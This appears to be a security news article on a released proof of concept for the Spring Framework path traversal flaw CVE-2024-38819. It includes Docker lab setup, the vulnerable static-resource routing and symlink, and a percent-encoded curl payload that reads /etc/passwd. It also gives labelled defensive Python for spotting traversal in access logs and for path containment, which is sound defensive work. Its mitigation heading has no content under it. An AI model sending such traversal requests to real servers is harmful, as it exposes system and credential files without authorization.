A Proof of Concept (PoC) exploit for the critical path traversal vulnerability identified as CVE-2024-38819 in the Spring Framework has been released, shedding light on a serious security issue affecting applications that serve static resources via functional web frameworks.
This vulnerability allows attackers to access unauthorized files on the server through carefully crafted HTTP requests.
The CVE-2024-38819 vulnerability impacts applications using the Spring Framework’s WebMvc.fn or WebFlux.fn for serving static resources.
Specifically, the issue lies in the improper handling of file paths, which enables attackers to perform directory traversal to access unauthorized files, including sensitive system files such as /etc/passwd.
The released PoC demonstrates how an attacker can exploit the vulnerability to extract sensitive file contents on a vulnerable server. Below are the steps provided to replicate the exploit.
Set Up the Vulnerable Environment
Use Spring Boot 3.3.4, which depends on Spring Framework 6.1.13 (one of the affected versions).
Build a Docker image containing the vulnerable setup using the following command:
```bash
cd vuln
docker build -t cve-2024-38819-poc .
```
Run the Vulnerable Container
Start the container and expose port 8080 to the host machine:
```bash
docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
```
Execute the Exploit
Run the following curl command to send a malicious HTTP request that exploits the vulnerability:
```bash
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
```
If the vulnerability is present, the contents of the /etc/passwd file will be displayed, indicating a successful attack.
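A request like the one in the curl step leaves a recognisable trace in the web server's access log. The following Python is an added example, not part of the published PoC or of the Spring Framework, that scans access log lines for requests under /static/ whose decoded path contains a `..` segment. It percent-decodes repeatedly so that a double-encoded sequence (`%252e%252e`) is caught as well, and it treats only a whole `..` segment as traversal, so a file name such as `logo..png` is not flagged. The log lines, client addresses, timestamps and status codes are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (Combined Log Format); not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Dec/2024:10:00:01 +0000] "GET /static/css/site.css HTTP/1.1" 200 512
10.0.0.9 - - [18/Dec/2024:10:00:02 +0000] "GET /static/link/%2e%2e/etc/passwd HTTP/1.1" 200 1421
10.0.0.9 - - [18/Dec/2024:10:00:03 +0000] "GET /static/link/%252e%252e/etc/passwd HTTP/1.1" 404 0
10.0.0.7 - - [18/Dec/2024:10:00:04 +0000] "GET /static/img/logo..png HTTP/1.1" 200 2048
"""

# Pulls the method and path out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def fully_decode(path, max_rounds=3):
    """Percent-decode until the value stops changing, so %252e (double-encoded '.') is caught."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(path):
    """True when any path segment, after decoding, is exactly '..'.

    Checking whole segments rather than the substring '..' avoids flagging
    legitimate names such as 'logo..png'.
    """
    decoded = fully_decode(path.split('?', 1)[0])
    return any(seg == '..' for seg in decoded.split('/'))


def find_traversal_attempts(log_text, prefix="/static/"):
    """Return (client_ip, raw_path, status) for requests under `prefix` containing a '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group('path')
        if path.startswith(prefix) and is_traversal(path):
            client_ip = line.split(' ', 1)[0]
            status = line.rsplit(' ', 2)[-2]
            hits.append((client_ip, path, status))
    return hits


if __name__ == "__main__":
    for ip, path, status in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {path} (status {status})")
```

A hit with a 200 status is the case worth investigating first, since it indicates the server actually returned content for the traversal path rather than rejecting it.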
The vulnerability arises from the following setup in the vulnerable application:
Static Resource Routing
The static resources are served using RouterFunctions and FileSystemResource in the application.
Example code:
```java
// Vulnerable configuration: maps /static/** onto the filesystem directory /app/static/.
public RouterFunction<ServerResponse> staticResourceRouter() {
    return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
}
```
Symbolic Link Exploitation
A symbolic link is created in the Dockerfile to reference a static directory:
```bash
RUN ln -s /static /app/static/link
```
Payload for Directory Traversal
An attacker can exploit the symbolic link and traverse directories by using percent-encoded paths like /static/link/%2e%2e/etc/passwd. %2e%2e is the URL-encoded representation of .. (parent directory), enabling directory traversal.
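What makes the traversal possible is that the request path is joined onto the base directory and the symlink is followed without checking where the result ends up. The defensive counterpart is to decode the path, reject `..` segments before touching the filesystem, and then confirm that the path the filesystem actually resolves (symlinks followed) still lies under the base directory. The following Python is an added example illustrating that containment check; it is not Spring's code and not the upstream fix. The `base/`, `outside/` and `base/link -> outside` layout it builds in a temporary directory is constructed to mirror the PoC's `ln -s` setup.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_static_path(base_dir, request_path, prefix="/static/"):
    """Map a request path under `prefix` to a file inside base_dir, or return None.

    Two independent checks: a decoded '..' segment is rejected outright, and the
    fully resolved path (symlinks followed) must still be contained in base_dir.
    """
    if not request_path.startswith(prefix):
        return None
    relative = unquote(request_path[len(prefix):])
    # Reject parent-directory segments after decoding, before any filesystem access.
    if any(seg == '..' for seg in relative.split('/')):
        return None
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, relative))
    # Containment check on the resolved path: a symlink inside base_dir that points
    # outside it (as /app/static/link does in the PoC) fails here.
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate if os.path.isfile(candidate) else None


def build_demo_tree():
    """Construct base/css/site.css, outside/secret.txt and the symlink base/link -> outside."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "base")
    outside = os.path.join(root, "outside")
    os.makedirs(os.path.join(base, "css"))
    os.makedirs(outside)
    with open(os.path.join(base, "css", "site.css"), "w") as f:
        f.write("body{}")
    with open(os.path.join(outside, "secret.txt"), "w") as f:
        f.write("not for the web")
    os.symlink(outside, os.path.join(base, "link"))
    return base


def run_demo():
    """Exercise the resolver against the constructed tree and report each outcome."""
    base = build_demo_tree()
    return {
        # Ordinary file under the base directory: served.
        "normal": resolve_static_path(base, "/static/css/site.css") is not None,
        # Encoded '..' through the symlink, as in the PoC request: rejected by the segment check.
        "encoded_dotdot": resolve_static_path(base, "/static/link/%2e%2e/outside/secret.txt"),
        # No '..' at all, but the symlink leads outside base: rejected by the containment check.
        "through_symlink": resolve_static_path(base, "/static/link/secret.txt"),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result}")
```

The containment check deliberately refuses any file reached through a symlink that leaves the base directory, even when the link was created on purpose; if content outside the base directory is meant to be served, it should be mapped as its own explicit location rather than reached through a link.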
To mitigate this vulnerability:
This PoC is released for educational purposes and to raise awareness of the vulnerability. Before testing or utilizing this PoC in any environment, ensure you have proper authorization and the environment is secured. Misusing this PoC may result in legal and ethical repercussions.
This vulnerability appears to be a continuation of similar issues identified in Spring Framework, such as CVE-2024-38816, but involves a different attack vector. Organizations relying on the Spring Framework for critical applications are urged to evaluate and secure their implementations promptly.